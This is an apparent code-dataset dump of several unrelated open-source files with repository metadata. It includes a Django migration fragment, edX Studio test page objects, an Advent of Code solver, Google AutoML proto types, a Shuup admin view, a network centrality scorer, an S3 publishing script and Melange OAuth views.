name="ResourcePagesSettings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"about_us_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"apply_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"bootcamps_programs_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"privacy_policy_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"site",
models.OneToOneField(
editable=False,
on_delete=django.db.models.deletion.CASCADE,
to="wagtailcore.Site",
),
),
(
"terms_of_service_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
],
options={"verbose_name": "Resource Pages"},
)
]
|
bsd-3-clause
| -725,346,538,183,442,300
| 32.204819
| 69
| 0.359216
| false
| 5.85138
| false
| false
| false
|
nttks/edx-platform
|
common/test/acceptance/pages/studio/library.py
|
1
|
11569
|
"""
Library edit page in Studio
"""
from bok_choy.javascript import js_defined, wait_for_js
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from selenium.webdriver.support.select import Select
from .component_editor import ComponentEditorView
from .container import XBlockWrapper
from ...pages.studio.users import UsersPageMixin
from ...pages.studio.pagination import PaginatedMixin
from selenium.webdriver.common.keys import Keys
from ..common.utils import confirm_prompt, wait_for_notification
from . import BASE_URL
class LibraryPage(PageObject):
"""
Base page for Library pages. Defaults URL to the edit page.
"""
def __init__(self, browser, locator, course_locator):
super(LibraryPage, self).__init__(browser)
self.locator = locator
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library edit page for the given library.
"""
return "{}/course/{}/library/{}".format(BASE_URL, unicode(self.course_locator), unicode(self.locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library edit page.
"""
return self.q(css='body.view-library').present
class LibraryEditPage(LibraryPage, PaginatedMixin, UsersPageMixin):
"""
Library edit page in Studio
"""
def get_header_title(self):
"""
The text of the main heading (H1) visible on the page.
"""
return self.q(css='h1.page-header-title').text
def wait_until_ready(self):
"""
When the page first loads, there is a loading indicator and most
functionality is not yet available. This waits for that loading to
finish.
Always call this before using the page. It also disables animations
for improved test reliability.
"""
self.wait_for_ajax()
super(LibraryEditPage, self).wait_until_ready()
@property
def xblocks(self):
"""
Return a list of xblocks loaded on the container page.
"""
return self._get_xblocks()
def are_previews_showing(self):
"""
Determines whether or not previews are showing for XBlocks
"""
return all([not xblock.is_placeholder() for xblock in self.xblocks])
def toggle_previews(self):
"""
Clicks the preview toggling button and waits for the previews to appear or disappear.
"""
toggle = not self.are_previews_showing()
self.q(css='.toggle-preview-button').click()
EmptyPromise(
lambda: self.are_previews_showing() == toggle,
'Preview is visible: %s' % toggle,
timeout=30
).fulfill()
self.wait_until_ready()
def click_duplicate_button(self, xblock_id):
"""
Click on the duplicate button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "duplicate").click()
wait_for_notification(self)
self.wait_for_ajax()
def click_delete_button(self, xblock_id, confirm=True):
"""
Click on the delete button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "delete").click()
if confirm:
confirm_prompt(self) # this will also wait_for_notification()
self.wait_for_ajax()
def _get_xblocks(self):
"""
Create an XBlockWrapper for each XBlock div found on the page.
"""
prefix = '.wrapper-xblock.level-page '
return self.q(css=prefix + XBlockWrapper.BODY_SELECTOR).map(
lambda el: XBlockWrapper(self.browser, el.get_attribute('data-locator'))
).results
def _div_for_xblock_id(self, xblock_id):
"""
Given an XBlock's usage locator as a string, return the WebElement for
that block's wrapper div.
"""
return self.q(css='.wrapper-xblock.level-page .studio-xblock-wrapper').filter(
lambda el: el.get_attribute('data-locator') == xblock_id
)
def _action_btn_for_xblock_id(self, xblock_id, action):
"""
Given an XBlock's usage locator as a string, return one of its action
buttons.
action is 'edit', 'duplicate', or 'delete'
"""
return self._div_for_xblock_id(xblock_id)[0].find_element_by_css_selector(
'.header-actions .{action}-button.action-button'.format(action=action)
)
class StudioLibraryContentEditor(ComponentEditorView):
"""
Library Content XBlock Modal edit window
"""
# Labels used to identify the fields on the edit modal:
LIBRARY_LABEL = "Library"
COUNT_LABEL = "Count"
SCORED_LABEL = "Scored"
PROBLEM_TYPE_LABEL = "Problem Type"
@property
def library_name(self):
""" Gets name of library """
return self.get_selected_option_text(self.LIBRARY_LABEL)
@library_name.setter
def library_name(self, library_name):
"""
Select a library from the library select box
"""
self.set_select_value(self.LIBRARY_LABEL, library_name)
EmptyPromise(lambda: self.library_name == library_name, "library_name is updated in modal.").fulfill()
@property
def count(self):
"""
Gets value of children count input
"""
return int(self.get_setting_element(self.COUNT_LABEL).get_attribute('value'))
@count.setter
def count(self, count):
"""
Sets value of children count input
"""
count_text = self.get_setting_element(self.COUNT_LABEL)
count_text.send_keys(Keys.CONTROL, "a")
count_text.send_keys(Keys.BACK_SPACE)
count_text.send_keys(count)
EmptyPromise(lambda: self.count == count, "count is updated in modal.").fulfill()
@property
def scored(self):
"""
Gets value of scored select
"""
value = self.get_selected_option_text(self.SCORED_LABEL)
if value == 'True':
return True
elif value == 'False':
return False
raise ValueError("Unknown value {value} set for {label}".format(value=value, label=self.SCORED_LABEL))
@scored.setter
def scored(self, scored):
"""
Sets value of scored select
"""
self.set_select_value(self.SCORED_LABEL, str(scored))
EmptyPromise(lambda: self.scored == scored, "scored is updated in modal.").fulfill()
@property
def capa_type(self):
"""
Gets value of CAPA type select
"""
return self.get_setting_element(self.PROBLEM_TYPE_LABEL).get_attribute('value')
@capa_type.setter
def capa_type(self, value):
"""
Sets value of CAPA type select
"""
self.set_select_value(self.PROBLEM_TYPE_LABEL, value)
EmptyPromise(lambda: self.capa_type == value, "problem type is updated in modal.").fulfill()
def set_select_value(self, label, value):
"""
Sets the select with given label (display name) to the specified value
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
@js_defined('window.LibraryContentAuthorView')
class StudioLibraryContainerXBlockWrapper(XBlockWrapper):
"""
Wraps :class:`.container.XBlockWrapper` for use with LibraryContent blocks
"""
url = None
def is_browser_on_page(self):
"""
Returns true iff the library content area has been loaded
"""
return self.q(css='article.content-primary').visible
def is_finished_loading(self):
"""
Returns true iff the Loading indicator is not visible
"""
return not self.q(css='div.ui-loading').visible
@classmethod
def from_xblock_wrapper(cls, xblock_wrapper):
"""
Factory method: creates :class:`.StudioLibraryContainerXBlockWrapper` from :class:`.container.XBlockWrapper`
"""
return cls(xblock_wrapper.browser, xblock_wrapper.locator)
def get_body_paragraphs(self):
"""
Gets library content body paragraphs
"""
return self.q(css=self._bounded_selector(".xblock-message-area p"))
@wait_for_js # Wait for the fragment.initialize_js('LibraryContentAuthorView') call to finish
def refresh_children(self):
"""
Click "Update now..." button
"""
btn_selector = self._bounded_selector(".library-update-btn")
self.wait_for_element_presence(btn_selector, 'Update now button is present.')
self.q(css=btn_selector).first.click()
# This causes a reload (see cms/static/xmodule_js/public/js/library_content_edit.js)
# Check that the ajax request that caused the reload is done.
# TODO self.wait_for_ajax()
# Then check that we are still on the right page.
self.wait_for(lambda: self.is_browser_on_page(), 'StudioLibraryContainerXBlockWrapper has reloaded.')
# Wait longer than the default 60 seconds, because this was intermittently failing on jenkins
# with the screenshot showing that the Loading indicator was still visible. See TE-745.
self.wait_for(lambda: self.is_finished_loading(), 'Loading indicator is not visible.', timeout=120)
# And wait to make sure the ajax post has finished.
self.wait_for_ajax()
self.wait_for_element_absence(btn_selector, 'Wait for the XBlock to finish reloading')
class LibraryHomePage(PageObject):
"""
Base page for Library pages. Defaults URL to the home page.
"""
def __init__(self, browser, course_locator):
super(LibraryHomePage, self).__init__(browser)
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library home page for the given library.
"""
return "{}/course/{}/libhome/".format(BASE_URL, unicode(self.course_locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library home page.
"""
return self.q(css='.libraries').present
def has_new_library_button(self):
"""
(bool) is the "New Library" button present?
"""
return self.q(css='.new-library-button').present
def click_new_library(self):
"""
Click on the "New Library" button
"""
self.q(css='.new-library-button').first.click()
self.wait_for_ajax()
def is_new_library_form_visible(self):
"""
        Is the new library form visible?
"""
return self.q(css='.wrapper-create-library').visible
def fill_new_library_form(self, display_name, number):
"""
Fill out the form to create a new library.
Must have called click_new_library() first.
"""
field = lambda fn: self.q(css='.wrapper-create-library #new-library-{}'.format(fn))
field('name').fill(display_name)
field('number').fill(number)
def is_new_library_form_valid(self):
"""
IS the new library form ready to submit?
"""
return (
self.q(css='.wrapper-create-library .new-library-save:not(.is-disabled)').present and
not self.q(css='.wrapper-create-library .wrap-error.is-shown').present
)
def submit_new_library_form(self):
"""
Submit the new library form.
"""
self.q(css='.wrapper-create-library .new-library-save').click()
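# Minimal usage sketch (illustrative; the browser and course_locator objects are
# assumed to come from the test harness, they are not created in this module):
#   page = LibraryHomePage(browser, course_locator)
#   page.visit()
#   page.click_new_library()
#   page.fill_new_library_form('My Library', 'LIB101')
#   if page.is_new_library_form_valid():
#       page.submit_new_library_form()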
|
agpl-3.0
| 3,979,192,120,614,835,000
| 33.126844
| 116
| 0.622007
| false
| 4.039455
| false
| false
| false
|
tmct/adventOfCode2016
|
problems/21/Solver.py
|
1
|
4493
|
import re
swap_positions_regex = r'swap position (\d+) with position (\d+)'
swap_letters_regex = r'swap letter (.) with letter (.)'
rotate_regex = r'rotate (left|right) (\d+)'
rotate_on_letter_position_regex = r'rotate based on position of letter (.)'
reverse_slice_regex = r'reverse positions (\d+) through (\d+)'
move_regex = r'move position (\d+) to position (\d+)'
class Solver:
def __init__(self, start_string, decrypt = False):
self.buffer = list(start_string)
self.instructions = []
self.decrypt = decrypt
self.reverse_shift = {int(i): int(j) for i, j in zip('13572460', '76542107')}
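        # Explanatory note (added): for an 8-character buffer, the forward rule
        # "rotate based on position of letter X" rotates right by 1 + index
        # (plus 1 more when the index is at least 4).  This table maps the
        # letter's index *after* that rotation to the extra right-rotation
        # that undoes it.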
def solve(self, input_file_name):
intermediates = [''.join(self.buffer)]
with open(input_file_name, 'r') as input_file:
for line in input_file:
self.add_instruction(line.strip())
if self.decrypt:
self.instructions = self.instructions[::-1]
for instruction in self.instructions:
instruction()
# intermediates.append(''.join(self.buffer))
# if not self.decrypt:
# intermediates = intermediates[::-1]
# for i in intermediates:
# print(i)
return ''.join(self.buffer)
def add_instruction(self, instruction_string):
match = re.search(swap_positions_regex, instruction_string)
if match:
return self.add_swap_positions_instruction(match)
match = re.search(swap_letters_regex, instruction_string)
if match:
return self.add_swap_letters_instruction(match)
match = re.search(rotate_regex, instruction_string)
if match:
return self.add_rotate_instruction(match)
match = re.search(rotate_on_letter_position_regex, instruction_string)
if match:
return self.add_rotate_on_letter_position_instruction(match)
match = re.search(reverse_slice_regex, instruction_string)
if match:
return self.reverse_slice_instruction(match)
match = re.search(move_regex, instruction_string)
if match:
return self.move_instruction(match)
raise Exception('Could not parse line! "{}"'.format(instruction_string))
def add_swap_positions_instruction(self, match):
first, second = (int(group) for group in match.groups())
def swap_positions():
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_positions)
def add_swap_letters_instruction(self, match):
def swap_letters():
first, second = (self.buffer.index(group) for group in match.groups())
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_letters)
def add_rotate_instruction(self, match):
steps = int(match.group(2)) % len(self.buffer)
if match.group(1) == 'left':
steps = (len(self.buffer) - steps) % len(self.buffer)
if self.decrypt:
steps = (len(self.buffer) - steps) % len(self.buffer)
def rotate():
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate)
def add_rotate_on_letter_position_instruction(self, match):
def rotate_on_letter_position():
if self.decrypt:
final_index = self.buffer.index(match.group(1)) % 8
steps = self.reverse_shift[final_index]
else:
steps = 1 + self.buffer.index(match.group(1))
if steps >= 5:
steps += 1
steps %= len(self.buffer)
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate_on_letter_position)
def reverse_slice_instruction(self, match):
first, second = (int(group) for group in match.groups())
def reverse_slice():
self.buffer = self.buffer[:first] + self.buffer[first:second + 1][::-1] + self.buffer[second + 1:]
self.instructions.append(reverse_slice)
def move_instruction(self, match):
first, second = (int(group) for group in match.groups())
if self.decrypt:
first, second = second, first
def move():
value = self.buffer[first]
del self.buffer[first]
self.buffer.insert(second, value)
self.instructions.append(move)
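# Minimal usage sketch (illustrative; the start strings and file name are assumed):
#   print(Solver('abcdefgh').solve('input.txt'))                 # scramble
#   print(Solver('fbgdceah', decrypt=True).solve('input.txt'))   # unscramble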
|
mit
| 7,164,240,172,985,285,000
| 38.761062
| 110
| 0.605831
| false
| 3.913763
| false
| false
| false
|
googleapis/python-automl
|
google/cloud/automl_v1beta1/types/classification.py
|
1
|
13060
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import temporal
__protobuf__ = proto.module(
package="google.cloud.automl.v1beta1",
manifest={
"ClassificationType",
"ClassificationAnnotation",
"VideoClassificationAnnotation",
"ClassificationEvaluationMetrics",
},
)
class ClassificationType(proto.Enum):
r"""Type of the classification problem."""
CLASSIFICATION_TYPE_UNSPECIFIED = 0
MULTICLASS = 1
MULTILABEL = 2
class ClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to classification.
Attributes:
score (float):
Output only. A confidence estimate between
0.0 and 1.0. A higher value means greater
confidence that the annotation is positive. If a
user approves an annotation as negative or
positive, the score value remains unchanged. If
a user creates an annotation, the score is 0 for
negative or 1 for positive.
"""
score = proto.Field(proto.FLOAT, number=1,)
class VideoClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to video classification.
Attributes:
type_ (str):
Output only. Expresses the type of video classification.
Possible values:
- ``segment`` - Classification done on a specified by user
time segment of a video. AnnotationSpec is answered to be
present in that time segment, if it is present in any
part of it. The video ML model evaluations are done only
for this type of classification.
- ``shot``- Shot-level classification. AutoML Video
Intelligence determines the boundaries for each camera
shot in the entire segment of the video that user
specified in the request configuration. AutoML Video
Intelligence then returns labels and their confidence
scores for each detected shot, along with the start and
end time of the shot. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
- ``1s_interval`` - AutoML Video Intelligence returns
labels and their confidence scores for each second of the
entire segment of the video that user specified in the
request configuration. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
classification_annotation (google.cloud.automl_v1beta1.types.ClassificationAnnotation):
Output only . The classification details of
this annotation.
time_segment (google.cloud.automl_v1beta1.types.TimeSegment):
Output only . The time segment of the video
to which the annotation applies.
"""
type_ = proto.Field(proto.STRING, number=1,)
classification_annotation = proto.Field(
proto.MESSAGE, number=2, message="ClassificationAnnotation",
)
time_segment = proto.Field(proto.MESSAGE, number=3, message=temporal.TimeSegment,)
class ClassificationEvaluationMetrics(proto.Message):
r"""Model evaluation metrics for classification problems. Note: For
Video Classification this metrics only describe quality of the Video
Classification predictions of "segment_classification" type.
Attributes:
au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric. Micro-averaged for the overall
evaluation.
base_au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric based on priors. Micro-averaged for
the overall evaluation. Deprecated.
au_roc (float):
Output only. The Area Under Receiver
Operating Characteristic curve metric. Micro-
averaged for the overall evaluation.
log_loss (float):
Output only. The Log Loss metric.
confidence_metrics_entry (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfidenceMetricsEntry]):
Output only. Metrics for each confidence_threshold in
0.00,0.05,0.10,...,0.95,0.96,0.97,0.98,0.99 and
position_threshold = INT32_MAX_VALUE. ROC and
precision-recall curves, and other aggregated metrics are
derived from them. The confidence metrics entries may also
be supplied for additional values of position_threshold, but
from these no aggregated metrics are computed.
confusion_matrix (google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix):
Output only. Confusion matrix of the
evaluation. Only set for MULTICLASS
classification problems where number of labels
is no more than 10.
Only set for model level evaluation, not for
evaluation per label.
annotation_spec_id (Sequence[str]):
Output only. The annotation spec ids used for
this evaluation.
"""
class ConfidenceMetricsEntry(proto.Message):
r"""Metrics for a single confidence threshold.
Attributes:
confidence_threshold (float):
Output only. Metrics are computed with an
assumption that the model never returns
predictions with score lower than this value.
position_threshold (int):
Output only. Metrics are computed with an assumption that
the model always returns at most this many predictions
(ordered by their score, descendingly), but they all still
need to meet the confidence_threshold.
recall (float):
Output only. Recall (True Positive Rate) for
the given confidence threshold.
precision (float):
Output only. Precision for the given
confidence threshold.
false_positive_rate (float):
Output only. False Positive Rate for the
given confidence threshold.
f1_score (float):
Output only. The harmonic mean of recall and
precision.
recall_at1 (float):
Output only. The Recall (True Positive Rate)
when only considering the label that has the
highest prediction score and not below the
confidence threshold for each example.
precision_at1 (float):
Output only. The precision when only
considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
false_positive_rate_at1 (float):
Output only. The False Positive Rate when
only considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
f1_score_at1 (float):
Output only. The harmonic mean of
[recall_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.recall_at1]
and
[precision_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.precision_at1].
true_positive_count (int):
Output only. The number of model created
labels that match a ground truth label.
false_positive_count (int):
Output only. The number of model created
labels that do not match a ground truth label.
false_negative_count (int):
Output only. The number of ground truth
labels that are not matched by a model created
label.
true_negative_count (int):
Output only. The number of labels that were
not created by the model, but if they would,
they would not match a ground truth label.
"""
confidence_threshold = proto.Field(proto.FLOAT, number=1,)
position_threshold = proto.Field(proto.INT32, number=14,)
recall = proto.Field(proto.FLOAT, number=2,)
precision = proto.Field(proto.FLOAT, number=3,)
false_positive_rate = proto.Field(proto.FLOAT, number=8,)
f1_score = proto.Field(proto.FLOAT, number=4,)
recall_at1 = proto.Field(proto.FLOAT, number=5,)
precision_at1 = proto.Field(proto.FLOAT, number=6,)
false_positive_rate_at1 = proto.Field(proto.FLOAT, number=9,)
f1_score_at1 = proto.Field(proto.FLOAT, number=7,)
true_positive_count = proto.Field(proto.INT64, number=10,)
false_positive_count = proto.Field(proto.INT64, number=11,)
false_negative_count = proto.Field(proto.INT64, number=12,)
true_negative_count = proto.Field(proto.INT64, number=13,)
class ConfusionMatrix(proto.Message):
r"""Confusion matrix of the model running the classification.
Attributes:
annotation_spec_id (Sequence[str]):
Output only. IDs of the annotation specs used in the
confusion matrix. For Tables CLASSIFICATION
[prediction_type][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type]
only list of [annotation_spec_display_name-s][] is
populated.
display_name (Sequence[str]):
Output only. Display name of the annotation specs used in
the confusion matrix, as they were at the moment of the
evaluation. For Tables CLASSIFICATION
[prediction_type-s][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type],
distinct values of the target column at the moment of the
model evaluation are populated here.
row (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix.Row]):
Output only. Rows in the confusion matrix. The number of
rows is equal to the size of ``annotation_spec_id``.
``row[i].example_count[j]`` is the number of examples that
have ground truth of the ``annotation_spec_id[i]`` and are
predicted as ``annotation_spec_id[j]`` by the model being
evaluated.
"""
class Row(proto.Message):
r"""Output only. A row in the confusion matrix.
Attributes:
example_count (Sequence[int]):
Output only. Value of the specific cell in the confusion
matrix. The number of values each row has (i.e. the length
of the row) is equal to the length of the
``annotation_spec_id`` field or, if that one is not
populated, length of the
[display_name][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfusionMatrix.display_name]
field.
"""
example_count = proto.RepeatedField(proto.INT32, number=1,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=1,)
display_name = proto.RepeatedField(proto.STRING, number=3,)
row = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ClassificationEvaluationMetrics.ConfusionMatrix.Row",
)
au_prc = proto.Field(proto.FLOAT, number=1,)
base_au_prc = proto.Field(proto.FLOAT, number=2,)
au_roc = proto.Field(proto.FLOAT, number=6,)
log_loss = proto.Field(proto.FLOAT, number=7,)
confidence_metrics_entry = proto.RepeatedField(
proto.MESSAGE, number=3, message=ConfidenceMetricsEntry,
)
confusion_matrix = proto.Field(proto.MESSAGE, number=4, message=ConfusionMatrix,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=5,)
__all__ = tuple(sorted(__protobuf__.manifest))
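# Minimal usage sketch (illustrative only):
#   from google.cloud.automl_v1beta1.types import classification
#   annotation = classification.ClassificationAnnotation(score=0.87)
#   assert 0.0 <= annotation.score <= 1.0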
|
apache-2.0
| 6,754,684,378,545,079,000
| 46.148014
| 134
| 0.633767
| false
| 4.737033
| false
| false
| false
|
suutari/shoop
|
shuup/admin/modules/suppliers/views/edit.py
|
1
|
1488
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.views import (
check_and_raise_if_only_one_allowed, CreateOrUpdateView
)
from shuup.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shuup/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_object(self, queryset=None):
obj = super(SupplierEditView, self).get_object(queryset)
check_and_raise_if_only_one_allowed("SHUUP_ENABLE_MULTIPLE_SUPPLIERS", obj)
return obj
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("No %s module") % self.model._meta.verbose_name)
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
|
agpl-3.0
| 8,299,280,317,891,628,000
| 32.066667
| 108
| 0.684812
| false
| 3.620438
| false
| false
| false
|
cemarchi/biosphere
|
Src/BioAnalyzer/Analysis/GenePrioritization/Steps/NetworkAnalysis/NetworkScoreAnalyzers/GeneNetworkScoreAnalyzer.py
|
1
|
2431
|
import operator
import networkx as nx
from scipy.stats import gmean
from Src.BioAnalyzer.Analysis.GenePrioritization.Steps.NetworkAnalysis.NetworkScoreAnalyzers.NetworkScoreAnalyzerBase \
import NetworkScoreAnalyzerBase
class GeneNetworkScoreAnalyzer(NetworkScoreAnalyzerBase):
def __init__(self):
pass
def calculate(self, network: nx.Graph) -> nx.Graph:
degree_centrality_measure = self.__get_centrality_measure(nx.degree_centrality(network))
page_rank_measure = self.__get_centrality_measure(nx.pagerank(network, alpha=0.85))
betweenness_measure = self.__get_centrality_measure(nx.betweenness_centrality(network))
hubs = None
authorities = None
try:
hubs, authorities = nx.hits(network)
except Exception:
pass
hubs_measure = self.__get_centrality_measure(hubs) if hubs else None
authorities_measure = self.__get_centrality_measure(authorities) if authorities else None
return self.__get_score(network, degree_centrality_measure, page_rank_measure, betweenness_measure,
hubs_measure, authorities_measure)
def __get_score(self, network, degree_centrality_measure, page_rank_measure, betweenness_measure, hubs_measure,
authorities_measure):
for node in network.node.keys():
score = []
if degree_centrality_measure and node in degree_centrality_measure:
score.append(degree_centrality_measure[node])
if page_rank_measure and node in page_rank_measure:
score.append(page_rank_measure[node])
if betweenness_measure and node in betweenness_measure:
score.append(betweenness_measure[node])
if hubs_measure and node in hubs_measure:
score.append(hubs_measure[node])
if authorities_measure and node in authorities_measure:
score.append(authorities_measure[node])
network.node[node]['centrality_value'] = gmean(score)
return network
def __get_centrality_measure(self, node_measurements):
nodes = sorted(node_measurements.items(), key=operator.itemgetter(1), reverse=True)
measurements = {}
measure = 1
for node, measure in nodes:
measurements[node] = measure
measure += 1
return measurements
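# Minimal usage sketch (illustrative toy graph, assuming a networkx version that
# still exposes Graph.node, as this module does):
#   import networkx as nx
#   g = nx.karate_club_graph()
#   scored = GeneNetworkScoreAnalyzer().calculate(g)
#   print(scored.node[0]['centrality_value'])   # geometric mean of the centrality scores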
|
bsd-3-clause
| -5,332,966,840,455,512,000
| 35.298507
| 119
| 0.654463
| false
| 4.220486
| false
| false
| false
|
smartystreets/jquery.liveaddress
|
resources/publish.py
|
1
|
2128
|
"""
This script is used by SmartyStreets when deploying a new version of the jquery.liveaddress plugin.
"""
import os.path as path
import os
import sys
import boto
from boto.s3.bucket import Bucket
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from utils import get_mime_type
def main():
cloudfront_connection = boto.connect_cloudfront()
s3_connection = connect_to_s3()
bucket = Bucket(s3_connection, S3_BUCKET)
publish(bucket, cloudfront_connection)
def connect_to_s3():
"""
    Workaround for '.' in bucket names when calling from Python 2.7.9+:
https://github.com/boto/boto/issues/2836#issuecomment-77283169
"""
if '.' in S3_BUCKET:
return S3Connection(calling_format=OrdinaryCallingFormat())
else:
return S3Connection()
def publish(bucket, cloudfront):
resources = []
for root, dirs, files in os.walk(WORKING_DIRECTORY):
for f in files:
if f not in EXCLUDES:
local_path = path.join(root, f)
resource_path = upload_to_s3(local_path, bucket)
resources.append(resource_path)
distribution = os.environ.get('AWS_CLOUDFRONT_DISTRIBUTION_ID') or raw_input('Enter the cloudfront distribution id: ')
distribution = distribution.strip()
if distribution:
print "Creating cloudfront invalidation for all uploaded resources..."
cloudfront.create_invalidation_request(distribution, resources)
def upload_to_s3(resource, bucket):
entry = Key(bucket)
entry.key = path.join(DESTINATION.format(VERSION), path.basename(resource))
entry.set_metadata('Content-Encoding', 'gzip')
entry.set_metadata('Content-Type', get_mime_type(resource))
print 'Publishing {0} to {1}...'.format(resource, entry.key)
entry.set_contents_from_filename(resource)
return entry.key
EXCLUDES = ['.DS_Store']
DESTINATION = '/jquery.liveaddress/{0}'
WORKING_DIRECTORY = '../workspace/'
S3_BUCKET = 'static.smartystreets.com'
VERSION = '.'.join(sys.argv[1].split('.')[0:2])
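# Example invocation (illustrative): `python publish.py 3.2.7` uploads the files in
# ../workspace/ to s3://static.smartystreets.com/jquery.liveaddress/3.2/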
if __name__ == '__main__':
main()
|
gpl-3.0
| 8,783,965,952,323,402,000
| 29.84058
| 122
| 0.681391
| false
| 3.60678
| false
| false
| false
|
adviti/melange
|
app/soc/views/oauth.py
|
1
|
4862
|
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing views for Open Auth.
"""
from django.conf.urls.defaults import url as django_url
from soc.views.helper.gdata_apis import oauth as oauth_helper
from soc.modules.gsoc.views.base import RequestHandler
from django.conf import settings
from django.utils import simplejson
class OAuthRedirectPage(RequestHandler):
"""Redirect page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/redirect$', self, name='gdata_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def context(self):
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.request.GET.get('next','/'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
context = {
'approval_page_url': url,
'page_name': 'Authorization Required',
}
return context
def templatePath(self):
"""Override this method to define a rendering template
"""
pass
class OAuthVerifyToken(RequestHandler):
"""Verify request token and redirect user.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/verify$', self, name='gdata_oauth_verify'),
]
return patterns
def get(self):
service = oauth_helper.createDocsService(self.data)
oauth_helper.checkOAuthVerifier(service, self.data)
next = self.request.GET.get('next','/')
self.redirect.toUrl(next)
return self.response
class PopupOAuthRedirectPage(RequestHandler):
"""Redirects popup page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/redirect$', self,
name='gdata_popup_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def get(self):
access_token = oauth_helper.getAccessToken(self.data.user)
if access_token:
url = self.redirect.urlOf('gdata_popup_oauth_verified')
else:
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.redirect.urlOf('gdata_popup_oauth_verified'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
self.redirect.toUrl(url)
return self.response
class PopupOAuthVerified(RequestHandler):
""" Calls parent window's methods to indicate successful login.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/verified$', self,
name='gdata_popup_oauth_verified')
]
return patterns
